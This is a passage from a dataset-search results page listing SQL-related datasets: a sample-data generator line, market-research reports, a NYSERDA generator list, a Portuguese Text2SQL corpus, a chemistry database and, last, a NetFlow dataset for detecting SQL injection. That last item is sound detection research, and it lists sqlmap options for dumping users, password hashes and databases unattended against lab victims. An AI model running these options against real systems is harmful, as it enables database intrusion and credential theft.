      print(f"INSERT INTO Adventurers (id, name, last_name, race, class, kingdom, level, gold) VALUES ({i}, '{name}', '{last_name}', '{race}', '{_class}', '{kingdom}', {level}, {gold});")
    
  12. ReCiterAnalysis.sql.

    • plos.figshare.com
    txt
    Updated Jun 11, 2023
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Paul J. Albert; Sarbajit Dutta; Jie Lin; Zimeng Zhu; Michael Bales; Stephen B. Johnson; Mohammad Mansour; Drew Wright; Terrie R. Wheeler; Curtis L. Cole (2023). ReCiterAnalysis.sql. [Dataset]. http://doi.org/10.1371/journal.pone.0244641.s006
    Explore at:
    txtAvailable download formats
    Dataset updated
    Jun 11, 2023
    Dataset provided by
    PLOShttp://plos.org/
    Authors
    Paul J. Albert; Sarbajit Dutta; Jie Lin; Zimeng Zhu; Michael Bales; Stephen B. Johnson; Mohammad Mansour; Drew Wright; Terrie R. Wheeler; Curtis L. Cole
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Database model for storing output of Feature Generator API. Includes some sample data. (SQL)

  13. D

    Distributed SQL Database Market Research Report 2033

    • dataintelo.com
    csv, pdf, pptx
    Updated Sep 30, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Dataintelo (2025). Distributed SQL Database Market Research Report 2033 [Dataset]. https://dataintelo.com/report/distributed-sql-database-market
    Explore at:
    csv, pptx, pdfAvailable download formats
    Dataset updated
    Sep 30, 2025
    Dataset authored and provided by
    Dataintelo
    License

    https://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy

    Time period covered
    2024 - 2032
    Area covered
    Global
    Description

    Distributed SQL Database Market Outlook



    According to our latest research, the global Distributed SQL Database market size reached USD 1.75 billion in 2024, marking a significant milestone in the evolution of enterprise data management. With a robust compound annual growth rate (CAGR) of 27.3% from 2025 to 2033, the market is projected to soar to USD 12.5 billion by 2033. This impressive growth trajectory is primarily fueled by the surging demand for scalable, resilient, and highly available database solutions across diverse sectors, driven by the exponential increase in data volumes and the necessity for real-time analytics in mission-critical applications.




    The primary growth factor underpinning the expansion of the Distributed SQL Database market is the escalating requirement for high availability and fault tolerance in enterprise IT environments. Modern organizations are increasingly adopting distributed architectures to ensure uninterrupted business operations, even in the face of hardware failures or network outages. Distributed SQL databases, with their inherent capability to replicate data across multiple nodes and geographies, offer a compelling solution for enterprises seeking to minimize downtime and data loss. This demand is further amplified by the proliferation of cloud-native applications and microservices architectures, where traditional monolithic databases struggle to keep pace with the needs of dynamic, distributed workloads.




    Another key driver for the Distributed SQL Database market is the rapid digital transformation initiatives being undertaken across industries such as BFSI, retail, healthcare, and manufacturing. Enterprises are leveraging distributed SQL databases to enable real-time analytics, support omnichannel customer experiences, and meet stringent regulatory requirements for data integrity and security. The increasing adoption of Internet of Things (IoT) devices and edge computing is also generating vast amounts of decentralized data, necessitating distributed database solutions that can seamlessly scale and process information at the edge while maintaining transactional consistency and global visibility.




    Moreover, the growing preference for hybrid and multi-cloud strategies is accelerating the adoption of distributed SQL databases. As organizations seek to avoid vendor lock-in and optimize their IT infrastructure for cost, performance, and compliance, distributed SQL databases provide the flexibility to deploy workloads across on-premises, public cloud, and edge environments. This flexibility not only enhances operational agility but also empowers enterprises to respond swiftly to changing business requirements and regulatory landscapes. The ability of distributed SQL databases to offer strong consistency, horizontal scalability, and global data distribution is positioning them as a foundational technology in the era of digital business.




    From a regional perspective, North America currently dominates the Distributed SQL Database market, accounting for the largest share in 2024, driven by the presence of leading technology vendors, early adoption of cloud-native solutions, and substantial investments in digital infrastructure. Asia Pacific, however, is emerging as the fastest-growing region, propelled by rapid economic development, expanding digital ecosystems, and increasing adoption of advanced data management solutions in countries such as China, India, and Japan. Europe and Latin America are also witnessing steady growth, supported by digital transformation initiatives and the rising demand for real-time data analytics across various sectors.



    Component Analysis



    The Distributed SQL Database market is segmented by component into Software and Services, with each category playing a vital role in the overall ecosystem. The software segment, encompassing database engines, management tools, and integration platforms, accounted for the lion’s share of the market revenue in 2024. This dominance can be attributed to the continuous innovation in database architectures, improvements in query optimization, and the integration of advanced features such as automated failover, distributed transactions, and real-time analytics. Vendors are focusing on enhancing their software offerings to support a wide array of deployment scenarios, including hybrid cloud, multi-cloud, and edge environments, which is further boosting the demand for robust distributed

  14. Fuel-NY Emergency Generators and Transfer Switches

    • splitgraph.com
    • data.ny.gov
    • +1more
    Updated Jul 1, 2024
    + more versions
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    New York State Energy Research and Development Authority (NYSERDA) (2024). Fuel-NY Emergency Generators and Transfer Switches [Dataset]. https://www.splitgraph.com/ny-gov/fuelny-emergency-generators-and-transfer-switches-i67p-6ac2
    Explore at:
    application/openapi+json, json, application/vnd.splitgraph.imageAvailable download formats
    Dataset updated
    Jul 1, 2024
    Dataset provided by
    New York State Energy Research and Development Authorityhttps://www.nyserda.ny.gov/
    Authors
    New York State Energy Research and Development Authority (NYSERDA)
    Area covered
    New York
    Description

    NYSERDA deployed Emergency Generators and Transfer Switches at Retail Gas Stations as part of the Fuel-NY initiative through its Gas Station Back-up Power Program and Permanent Generator Program using FEMA Hazard Mitigation Grant Program funding. This dataset is a complete listing of all installations under the two programs, which ran from 6/1/2013 through 1/26/2019. This dataset contains business names, locations, and the type of installation for program participants.

    These efforts improved the resiliency of the retail gasoline system in the downstate New York area by providing back up power options to gas stations.

    These stations have either the capability to easily accept backup power or have a backup generator permanently installed on site. The equipment allows the stations to mitigate the effects of power outages, increase the availability of fuel, and support first responders during and after emergencies and severe weather events. Additional socioeconomic benefits are achieved by supporting residents and early recovery efforts with continued access to fuel as well as food, grocery, and necessary household items, increasing the resiliency capabilities of their communities.

    The New York State Energy Research and Development Authority (NYSERDA) offers objective information and analysis, innovative programs, technical expertise, and support to help New Yorkers increase energy efficiency, save money, use renewable energy, accelerate economic growth, and reduce reliance on fossil fuels. To learn more about NYSERDA’s programs, visit nyserda.ny.gov or follow us on X, Facebook, YouTube, or Instagram.

    Splitgraph serves as an HTTP API that lets you run SQL queries directly on this data to power Web applications. For example:

    See the Splitgraph documentation for more information.

  15. Portuguese Text2SQL database

    • kaggle.com
    Updated Jun 19, 2024
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Eduardo M. de Morais (2024). Portuguese Text2SQL database [Dataset]. https://www.kaggle.com/datasets/emdemor/portuguese-text2sql-database
    Explore at:
    CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset updated
    Jun 19, 2024
    Dataset provided by
    Kagglehttp://kaggle.com/
    Authors
    Eduardo M. de Morais
    License

    Attribution-NonCommercial-ShareAlike 4.0 (CC BY-NC-SA 4.0)https://creativecommons.org/licenses/by-nc-sa/4.0/
    License information was derived automatically

    Description

    Overview

    This dataset is a Portuguese-translated version of the b-mc2/sql-create-context dataset, which was constructed from the WikiSQL and Spider datasets. It contains examples of questions in Portuguese, SQL CREATE TABLE statements, and SQL queries that answer the questions using the CREATE TABLE statement as context.

    The main goal of this dataset is to assist Portuguese natural language models in generating precise and contextualized SQL queries, preventing the hallucination of column and table names, a common issue in text-to-SQL datasets. By providing only the CREATE TABLE statement as context, the dataset aims to better ground the models without the need to provide actual data rows, limiting token use and exposure to private, sensitive, or proprietary data.

    Dataset Details

    • Total Examples: 78,577
    • Columns:
      • pergunta: The question in natural language.
      • contexto: The SQL CREATE TABLE statement that provides the necessary context to answer the question.
      • resposta: The SQL query that answers the question using the provided context.

    Translation Process

    The questions were translated into Portuguese using the facebook/nllb-200-distilled-1.3B model, ensuring that the natural language queries maintain the same meaning and context as the original English questions.

    Objective and Applications

    This dataset is ideal for training natural language models for SQL query generation, especially in scenarios where accuracy in naming columns and tables is crucial. It can be used to enhance model performance in text-to-SQL tasks, providing clear context and avoiding common hallucination errors.

    Original Projects

    @misc{b-mc2_2023_sql-create-context,
    title = {sql-create-context Dataset},
    author = {b-mc2},
    year = {2023},
    url = {https://huggingface.co/datasets/b-mc2/sql-create-context},
    note = {This dataset was created by modifying data from the following sources: \cite{zhongSeq2SQL2017, yu2018spider}.},
    }
    
    @article{zhongSeq2SQL2017,
    author = {Victor Zhong and Caiming Xiong and Richard Socher},
    title = {Seq2SQL: Generating Structured Queries from Natural Language using Reinforcement Learning},
    journal = {CoRR},
    volume = {abs/1709.00103},
    year = {2017}
    }
    
    @article{yu2018spider,
    title = {Spider: A large-scale human-labeled dataset for complex and cross-domain semantic parsing and text-to-sql task},
    author = {Yu, Tao and Zhang, Rui and Yang, Kai and Yasunaga, Michihiro and Wang, Dongxu and Li, Zifan and Ma, James and Li, Irene and Yao, Qingning and Roman, Shanelle and others},
    journal = {arXiv preprint arXiv:1809.08887},
    year = {2018}
    }
    
  16. R

    Cloud SQL Market Research Report 2033

    • researchintelo.com
    csv, pdf, pptx
    Updated Jul 24, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Research Intelo (2025). Cloud SQL Market Research Report 2033 [Dataset]. https://researchintelo.com/report/cloud-sql-market
    Explore at:
    pptx, csv, pdfAvailable download formats
    Dataset updated
    Jul 24, 2025
    Dataset authored and provided by
    Research Intelo
    License

    https://researchintelo.com/privacy-and-policyhttps://researchintelo.com/privacy-and-policy

    Time period covered
    2024 - 2033
    Area covered
    Global
    Description

    Cloud SQL Market Outlook



    According to our latest research, the global Cloud SQL market size in 2024 stands at USD 7.8 billion, reflecting robust adoption across industries. The market is poised for significant expansion, projected to reach USD 32.5 billion by 2033, growing at a compelling CAGR of 17.2% during the forecast period. This remarkable growth is primarily driven by the increasing demand for scalable, flexible, and cost-efficient database management solutions that support digital transformation initiatives worldwide.



    A primary growth factor for the Cloud SQL market is the accelerating shift toward cloud-based infrastructure in organizations of all sizes. Enterprises are increasingly migrating their data workloads to the cloud to leverage benefits such as reduced operational costs, enhanced scalability, and improved data accessibility. Cloud SQL solutions, with their managed database services, eliminate the need for manual database maintenance and updates, thereby allowing IT teams to focus on core business activities. Furthermore, the proliferation of data from IoT devices, mobile applications, and digital services is generating an unprecedented amount of structured and unstructured data, necessitating robust database solutions that can seamlessly scale with demand. As organizations prioritize agility and innovation, the adoption of Cloud SQL platforms is becoming integral to their IT strategies.



    Another significant driver is the growing emphasis on data security, compliance, and disaster recovery. Cloud SQL services offer advanced security features, including data encryption, automated backups, and multi-region replication, ensuring business continuity and regulatory compliance. The rise in cyber threats and stringent data protection regulations such as GDPR and HIPAA have made secure data management a top priority for enterprises. By leveraging Cloud SQL, organizations can mitigate the risks associated with data breaches and ensure that their critical business information is protected against potential threats. Additionally, the ability to automate backup and recovery processes reduces downtime and safeguards against data loss, further enhancing the value proposition of cloud-based SQL databases.



    The integration of advanced analytics and artificial intelligence is also catalyzing the expansion of the Cloud SQL market. Organizations are increasingly harnessing the power of business intelligence and analytics tools to extract actionable insights from their data. Cloud SQL platforms facilitate seamless integration with analytics solutions, enabling real-time data processing and visualization. This capability is particularly valuable for industries such as retail, healthcare, and BFSI, where timely insights can drive better decision-making and competitive advantage. As digital transformation accelerates, the need for agile, intelligent, and data-driven operations will continue to fuel the adoption of Cloud SQL solutions across diverse sectors.



    From a regional perspective, North America currently dominates the Cloud SQL market, accounting for the largest share in 2024, driven by the presence of leading cloud service providers, rapid technological advancements, and high digital adoption rates. Europe follows closely, propelled by stringent data privacy regulations and strong demand from sectors such as BFSI and healthcare. The Asia Pacific region is anticipated to witness the fastest growth, with a CAGR exceeding 19%, fueled by increasing cloud adoption among SMEs, government digitalization initiatives, and a burgeoning IT services sector. Meanwhile, Latin America and the Middle East & Africa are gradually catching up, with growing investments in cloud infrastructure and digital transformation projects.



    Database Type Analysis



    The Cloud SQL market is broadly segmented by database type into relational and non-relational databases. Relational databases, such as MySQL, PostgreSQL, and Microsoft SQL Server, continue to dominate the market due to their widespread use in transactional applications and enterprise workloads. These databases are prized for their ability to maintain data integrity, support complex queries, and provide consistent performance. Businesses in industries like BFSI, healthcare, and retail rely heavily on relational databases for mission-critical applications where data accuracy and reliability are paramount. The demand for managed relational database services in the cloud is further boosted by the need for seamless migration fr

  17. D

    SQL Performance Tuning Tools Market Research Report 2033

    • dataintelo.com
    csv, pdf, pptx
    Updated Sep 30, 2025
    + more versions
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Dataintelo (2025). SQL Performance Tuning Tools Market Research Report 2033 [Dataset]. https://dataintelo.com/report/sql-performance-tuning-tools-market
    Explore at:
    csv, pdf, pptxAvailable download formats
    Dataset updated
    Sep 30, 2025
    Dataset authored and provided by
    Dataintelo
    License

    https://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy

    Time period covered
    2024 - 2032
    Area covered
    Global
    Description

    SQL Performance Tuning Tools Market Outlook



    According to our latest research, the global SQL Performance Tuning Tools market size reached USD 1.42 billion in 2024, exhibiting robust expansion driven by the surging need for optimized database management and real-time analytics across enterprises. The market is poised to grow at a CAGR of 9.7% from 2025 to 2033, with the forecasted value expected to hit USD 3.27 billion by 2033. This growth is primarily attributed to the increasing complexity of database environments, the proliferation of data-driven applications, and the urgent demand for high availability and efficiency in mission-critical business operations. As organizations continue to digitize and scale their infrastructure, SQL performance tuning tools are becoming indispensable for ensuring seamless data processing and superior user experiences.




    A significant growth factor for the SQL Performance Tuning Tools market is the exponential increase in data volumes generated by organizations worldwide. Enterprises are embracing digital transformation initiatives, leading to a surge in transactional and analytical workloads that demand high-performing databases. SQL performance tuning tools play a pivotal role in identifying, diagnosing, and resolving performance bottlenecks within SQL queries and database configurations. With the adoption of advanced analytics, artificial intelligence, and machine learning, organizations are generating and processing more data than ever before, necessitating robust tools to ensure optimal database performance. This trend is particularly pronounced in sectors such as BFSI, healthcare, and e-commerce, where data-driven decision-making and real-time insights are critical for competitive advantage.




    Another key driver is the growing complexity of IT environments, particularly with the rise of hybrid and multi-cloud deployments. As enterprises migrate workloads to cloud platforms and integrate on-premises systems with cloud-based solutions, managing and tuning SQL databases becomes increasingly challenging. SQL performance tuning tools enable IT teams to monitor and optimize database performance across diverse and distributed environments, ensuring consistency, reliability, and scalability. These tools offer advanced features such as automated query optimization, real-time monitoring, and predictive analytics, which are essential for maintaining service-level agreements (SLAs) and minimizing downtime. The increasing reliance on cloud infrastructure, coupled with the need for agile and resilient database management, is expected to further propel market growth.




    The expanding ecosystem of database technologies and the proliferation of open-source SQL databases are also fueling demand for performance tuning solutions. Organizations are adopting a wide range of relational and non-relational databases to support diverse workloads, leading to greater heterogeneity in database environments. This diversity introduces new challenges in performance management, as traditional tuning methods may not be effective across different platforms. SQL performance tuning tools are evolving to support a broad spectrum of database engines, providing unified visibility and optimization capabilities. As businesses strive to deliver high-quality digital experiences and minimize operational costs, the adoption of advanced tuning tools is becoming a strategic imperative.




    From a regional perspective, North America continues to dominate the SQL Performance Tuning Tools market, accounting for the largest share in 2024. This leadership is driven by the presence of major technology vendors, a mature IT infrastructure, and early adoption of advanced database management solutions. Europe and Asia Pacific are also witnessing rapid growth, fueled by increasing investments in digital transformation, expanding IT services sectors, and the rise of cloud computing. The Asia Pacific region, in particular, is expected to exhibit the highest CAGR during the forecast period, supported by the proliferation of SMEs, growing e-commerce activities, and government initiatives to promote digital innovation. Meanwhile, Latin America and the Middle East & Africa are emerging as promising markets, albeit at a relatively nascent stage, as organizations in these regions modernize their IT landscapes and embrace data-driven strategies.



    Component Analysis



    The SQL Performance Tuning Tools market by component is broadly segmented into software and servi

  18. O

    OLTP Report

    • archivemarketresearch.com
    doc, pdf, ppt
    Updated May 31, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Archive Market Research (2025). OLTP Report [Dataset]. https://www.archivemarketresearch.com/reports/oltp-559625
    Explore at:
    ppt, pdf, docAvailable download formats
    Dataset updated
    May 31, 2025
    Dataset authored and provided by
    Archive Market Research
    License

    https://www.archivemarketresearch.com/privacy-policyhttps://www.archivemarketresearch.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The Online Transaction Processing (OLTP) market is experiencing robust growth, driven by the increasing adoption of cloud-based solutions, the proliferation of mobile and IoT devices generating massive transactional data, and the rising demand for real-time data processing across diverse industries. Let's assume, for illustrative purposes, a 2025 market size of $150 billion, with a Compound Annual Growth Rate (CAGR) of 12% projected for the forecast period of 2025-2033. This signifies a substantial expansion of the market, reaching an estimated value exceeding $400 billion by 2033. Key drivers include the need for enhanced operational efficiency, improved customer experience through faster transaction processing, and the ability to leverage real-time data for informed decision-making. The increasing adoption of advanced technologies like in-memory databases and distributed databases further fuels this growth. Significant trends shaping the OLTP market include the shift towards cloud-based deployment models, owing to their scalability, cost-effectiveness, and ease of management. The growing demand for high-availability and fault-tolerant systems is also pushing innovation in database technologies. The integration of artificial intelligence (AI) and machine learning (ML) for predictive analytics and fraud detection within OLTP systems is another key trend gaining momentum. While the market faces certain restraints like data security concerns, integration complexities, and the need for skilled professionals, the overall growth trajectory remains positive, driven by strong market demand and technological advancements. The segment analysis shows a significant contribution from cloud-based OLTP solutions, with the market being highly competitive, with key players constantly innovating to maintain their market share.

  19. Z

    pyKinML database

    • data.niaid.nih.gov
    • zenodo.org
    Updated Apr 10, 2024
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Martí, Carles; Zádor, Judit; Najm, Habib; Devereux, Christian (2024). pyKinML database [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_10892201
    Explore at:
    Dataset updated
    Apr 10, 2024
    Dataset provided by
    Sandia National Laboratories California
    Authors
    Martí, Carles; Zádor, Judit; Najm, Habib; Devereux, Christian
    License

    Attribution 3.0 (CC BY 3.0)https://creativecommons.org/licenses/by/3.0/
    License information was derived automatically

    Description

    This is a set of SQL databases with information about molecules and radicals with the following database conventions and content.

    Each database is named as “CnHm”, where n and m range from 1 to 5 and indicate the number of carbon (C) and hydrogen (H) atoms in the structures in the database.

    Each database contains entries of a large number of “CnHm” geometries. Within each database are frous tables.

    Table “meta”Contains the name of the database and the date it was created.Table “xyz”The columns of the “xyz” database are the following:

    “id”: a numerical identification number, integer

    “calc_params”: metadata describing the level of theory and other details of the quantum chemical calculations to generate the Hessian used for generating this structure, numpy array stored as a blob.

    “calc”: software used to for the calculation, string

    “temp”: the temperature used during the normal mode sampling process to generate the structure in K, outliers are assigned negative temperature, float

    “name”: a unique name describing the anchor point the structure was generated from, string

    “dist”: the normalized unitless distance of the structure from its anchor point at the temperature given in “temp”, float

    “geometry”: atomic coordinates in angstroms, (n+m) by 3 numpy array of floats stored as a blob. Note that the atomic positions are listed with carbons first followed by hydrogens.

    “created_at”: date the structure was generated

    Table “energy”The columns of the “energy” database are the following:

    “id”: a numerical identification number, not linked to the “id” in “xyz”, integer

    “fidelity”: the fidelity level the energy was calculated at, integer

    0 = B3LYP/6-31+G(d)

    1 = wB97X-D/6-311++G(d,p)

    2 = HF/6-31G

    3 = B3LYP/6-31G

    4 = B2PLYPD3/6-311++G(d,p)

    “E”: molecular energy in eV, float

    “xyz_id”: the “id” of the geometry in the “xyz” table this energy calculated for, integer

    “hessian”: empty

    “forces”: atomic forces in eV/angstrom, (n+m) by 3 numpy array of floats stored as a blob. Note that the atomic forces are listed in the same order as the atoms in the “geometry” in the “xyz” table

    “calc_params”: metadata describing the level of theory and other details of the energy and force calculations of this entry, numpy array stored as a blob

    “calc”: software used to for the energy and force calculation

    “created_at”: date the energy and forces were calculated

    “sample_set_id”: empty

    Table “aev”: currently empty (edited)

  20. D

    SQL Query Audit Tools Market Research Report 2033

    • dataintelo.com
    csv, pdf, pptx
    Updated Oct 1, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Dataintelo (2025). SQL Query Audit Tools Market Research Report 2033 [Dataset]. https://dataintelo.com/report/sql-query-audit-tools-market
    Explore at:
    pdf, pptx, csvAvailable download formats
    Dataset updated
    Oct 1, 2025
    Dataset authored and provided by
    Dataintelo
    License

    https://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy

    Time period covered
    2024 - 2032
    Area covered
    Global
    Description

    SQL Query Audit Tools Market Outlook



    According to our latest research, the SQL Query Audit Tools market size reached USD 1.26 billion in 2024, reflecting robust adoption across multiple industries. The market is projected to expand at a CAGR of 13.2% from 2025 to 2033, culminating in a forecasted market value of USD 3.69 billion by 2033. This substantial growth trajectory is primarily driven by the escalating demand for robust database security and compliance solutions in an era marked by increasingly stringent data privacy regulations and an upsurge in cyber threats targeting sensitive business information.




    One of the most significant growth factors for the SQL Query Audit Tools market is the rising complexity and volume of enterprise data. Organizations across sectors are generating and handling massive amounts of structured and unstructured data, necessitating advanced auditing mechanisms to ensure data integrity, compliance, and security. The proliferation of digital transformation initiatives, cloud migration, and the adoption of big data analytics have further underscored the need for sophisticated tools capable of auditing SQL queries in real-time. These tools not only help organizations identify suspicious activities and unauthorized access but also play a pivotal role in maintaining regulatory compliance, especially in highly regulated industries such as banking, financial services, and healthcare.




    The growing regulatory landscape is another key driver propelling the SQL Query Audit Tools market. Governments and regulatory bodies worldwide have introduced stringent data protection laws such as GDPR, HIPAA, and CCPA, compelling organizations to implement comprehensive audit trails for all database activities. SQL query audit tools offer granular visibility into database transactions, enabling companies to demonstrate compliance and avoid hefty fines associated with non-compliance. Furthermore, as cyberattacks become more sophisticated, organizations are increasingly recognizing the value of proactive monitoring and auditing solutions that can detect anomalies, prevent data breaches, and support forensic investigations in the event of security incidents.




    Technological advancements and the integration of artificial intelligence and machine learning into SQL query audit tools are also fueling market expansion. Modern solutions are leveraging AI-driven analytics to automate anomaly detection, streamline compliance reporting, and enhance the accuracy of security alerts. Additionally, the shift towards cloud-based deployments is making these tools more accessible to small and medium enterprises (SMEs), which historically faced barriers due to high upfront costs and resource constraints. The combination of technological innovation, regulatory pressure, and the increasing importance of data governance is expected to sustain the strong growth momentum of the SQL Query Audit Tools market in the coming years.




    Regionally, North America currently dominates the SQL Query Audit Tools market, accounting for the largest share in 2024, followed by Europe and the Asia Pacific. The United States, in particular, is witnessing significant adoption driven by the presence of large enterprises, advanced IT infrastructure, and a highly regulated business environment. Europe is also experiencing robust growth, fueled by stringent data protection regulations and increasing investments in cybersecurity solutions. Meanwhile, the Asia Pacific region is poised for the fastest growth over the forecast period, supported by rapid digitalization, expanding IT and telecommunications sectors, and rising awareness about data security among enterprises in emerging economies such as China and India.



    Component Analysis



    The Component segment of the SQL Query Audit Tools market is bifurcated into software and services, each playing a critical role in the overall ecosystem. Software solutions form the backbone of the market, encompassing standalone audit tools, integrated database management platforms, and advanced analytics engines. These software offerings are designed to monitor, log, and analyze SQL queries in real-time, providing detailed audit trails and actionable insights for security, compliance, and performance optimization. The demand for feature-rich, scalable, and user-friendly software is on the rise as organizations seek to automate audit processes and minimize manual intervention.



    &

Share
FacebookFacebook
TwitterTwitter
Email
Click to copy link
Link copied
Close
Cite
Ignacio Crespo; Adrián Campazas (2022). SQL Injection Attack Netflow [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_6907251

Data from: SQL Injection Attack Netflow

Related Article
Explore at:
Dataset updated
Sep 28, 2022
Authors
Ignacio Crespo; Adrián Campazas
License

Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically

Description

Introduction

This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.

NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

Datasets

The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).

The datasets contain both benign and malicious traffic. All collected datasets are balanced.

The version of NetFlow used to build the datasets is 5.

    Dataset
    Aim
    Samples
    Benign-malicious
    traffic ratio




    D1
    Training
    400,003
    50%


    D2
    Test
    57,239
    50%

Infrastructure and implementation

Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.

DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)

Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).

The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.

The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.

    Parameters
    Description




    '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema'
    Enumerate users, password hashes, privileges, roles, databases, tables and columns


    --level=5
    Increase the probability of a false positive identification


    --risk=3
    Increase the probability of extracting data


    --random-agent
    Select the User-Agent randomly


    --batch
    Never ask for user input, use the default behavior


    --answers="follow=Y"
    Predefined answers to yes

Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).

The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.

However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.

To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.

Search
Clear search
Close search
Google apps
Main menu